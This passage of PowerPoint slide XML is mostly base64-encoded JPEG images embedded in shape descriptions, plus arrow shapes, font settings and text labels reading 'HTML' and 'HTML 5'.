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2027238"/>
            <a:ext cx="4114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6" descr="data:image/jpeg;base64,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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="307975" y="-1874838"/>
            <a:ext cx="4114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073396" y="2710434"/>
            <a:ext cx="489204" cy="242316"/>
          </a:xfrm>
          <a:prstGeom prst="right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7054596" y="2710434"/>
            <a:ext cx="489204" cy="242316"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B71234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26282" y="139499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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML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5065" y="139499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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML 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32079" y="139499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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 2" descr="data:image/jpeg;base64,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